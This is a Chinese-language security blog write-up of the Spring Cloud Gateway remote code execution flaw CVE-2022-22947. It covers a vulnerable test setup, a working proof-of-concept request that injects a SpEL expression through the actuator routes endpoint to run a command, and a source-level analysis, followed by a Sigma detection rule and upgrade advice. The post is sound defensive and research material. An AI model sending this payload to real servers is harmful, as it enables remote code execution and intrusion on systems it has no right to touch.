ATT&CK-Spring cloud gateway(CVE-2022-22947)漏洞分析与利用
共 5870字,需浏览 12分钟
· 2022-05-26
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
前言
原理:
Spring Cloud Gateway 是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的API路由管理方式。
springCloud Gateway被爆致命RCE , CVE-2022-22947 当应用程序启用和暴露Spring Cloud Gateway的Gateway Actuator endpoint时,会受到远程代码注入攻击,攻击者发送恶意请求从而可远程执行任意代码。
漏洞影响版本:
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
环境搭建
先下载源码 [cve_2022_22947]
(https://github.com/XuCcc/VulEnv/tree/master/springboot/cve_2022_22947),其中pom.xml需要修改一下,idea运行即可。
使用如下依赖创建一个maven工程:
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.6.4</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>person.xu</groupId>
<artifactId>vulEnv</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>cve_2022_22947</name>
<description>Demo project for Spring Boot</description>
<properties>
<java.version>1.8</java.version>
<spring-cloud.version>2021.0.1</spring-cloud.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
<version>3.0.6</version>
</dependency>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-gateway-server</artifactId>
<version>3.0.6</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>${spring-cloud.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
漏洞复现
发送如下的POC:
POST /actuator/gateway/routes/bigsea HTTP/1.1
Host: 192.168.80.150:8080
Accept-Encoding: gzip, deflate
Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 308
Content-Type: application/json
{
"id": "bigsea",
"predicates": [{
"name": "Path",
"args": {"_genkey_0":"/bigsea"}
}],
"filters":[{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "# {T(java.lang.Runtime).getRuntime().exec(\"calc\")}"
}
}],
"uri": "http://127.0.0.1:9999"
}]
然后发送POST /actuator/gateway/refresh 刷新路由缓存信息即可触发POC:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.80.150:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 0
![](https://filescdn.proginn.com/7943fa66acec72b688c211a0eaf8b87d/4ac432e75361c612f486530a0229c067.webp)
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
漏洞分析
首先,在
org.springframework.cloud.gateway.support.ShortcutConfigurable
的ShortcutType枚举类这里设置断点。
恶意参数传递过来,通过getValue方法,spel表达式解析,导致代码执行漏洞的产生。
![](https://filescdn.proginn.com/c426bd6102175d0be38ed4dd6882209f/935a99db4386cf3beb06f4beacebcd1e.webp)
跟进getValue方法:
StandardEvaluationContext context = new StandardEvaluationContext();
context.setBeanResolver(new BeanFactoryResolver(beanFactory));
Expression expression = parser.parseExpression(entryValue, new TemplateParserContext());
value = expression.getValue(context);
![](https://filescdn.proginn.com/b28a5649918a33cbe8853049f0d07fba/33085dd8f69be12aaaabcc1b9782a089.webp)
![](https://filescdn.proginn.com/2027201db6405d64df9217e6d0cbdbaf/73fc73ca34d20a40eed20682fe6873ae.webp)
跟进expression.getValue方法:
ExpressionState expressionState = new ExpressionState(getEvaluationContext(), this.configuration);
TypedValue typedResultValue = this.ast.getTypedValue(expressionState);
checkCompile(expressionState);
位置:
C:\Users\HOME.m2\repository\org\springframework\spring-expression\5.3.16\spring-expression-5.3.16-sources.jar!\org\springframework\expression\spel\standard\SpelExpression.java
![](https://filescdn.proginn.com/830cc66f55b3f6e43ad46bd29b359253/b103ccf182cf42a91f56d3f7b43e549e.webp)
继续跟进该方法,TypedValue typedResultValue = this.ast.getTypedValue(expressionState); 返回执行结果。
![](https://filescdn.proginn.com/30a1bb7ffbe521e028472b9b65c4ba4f/251d0781d84c94a065cf7875b4777ad9.webp)
![](https://filescdn.proginn.com/178202ead61ab7015e755cceb9d69ce7/e1d2e324fa07c2dcb100666711de7920.webp)
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
检测规则
Sigma检测规则如下:
title: Spring cloud gateway(CVE-2022-22947)表达式注入漏洞
description: 检测Spring cloud gateway(CVE-2022-22947)表达式注入漏洞
status: test
date: 2022/04/10
author: bigsea
logsource:
category: webserver
detection:
selection:
c-uri|contains:
- '/actuator/gateway/routes/'
- '/actuator/gateway/refresh'
- '# {T(org.springframework.cglib.core.ReflectUtils).defineClass'
- '# {T(java.lang.Runtime).getRuntime().exec'
condition: selection
fields:
- c-ip
- c-dns
tags:
- attack.t1190
- attack.initial_access
- cve.2022.22947
level: Critical
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
缓解措施
Spring Cloud Gateway 3.1.x用户应升级到3.1.1+
Spring Cloud Gateway 3.0.x用户应升级到3.0.7+
如果不需要Actuator端点,可以通过management.endpoint.gateway.enable:false配置将其禁用
如果需要Actuator端点,则应使用Spring Security对其进行保护
![](https://filescdn.proginn.com/5d7e1510d78a8f2a6b048b9b7c76a740/5bd3a72de029239599809bb4e2a25dc5.webp)
参考链接
安恒信息
✦
杭州亚运会网络安全服务官方合作伙伴
成都大运会网络信息安全类官方赞助商
武汉军运会、北京一带一路峰会
青岛上合峰会、上海进博会
厦门金砖峰会、G20杭州峰会
支撑单位北京奥运会等近百场国家级
重大活动网络安保支撑单位
![](https://filescdn.proginn.com/86141ef54937c5afbf83e60b480d3aa5/9e8c080873462ae01437523fac339993.webp)
END
![](https://filescdn.proginn.com/701b3edeb14acf5c0e37ec7b1d40a444/be5fa797029e934b6a7b2ac7c1a3216a.webp)
![](https://filescdn.proginn.com/aa3bafd47f22f2f21d9f75d34d5b6d67/cad136a50180e4c3a8c8983441025cac.webp)
长按识别二维码关注我们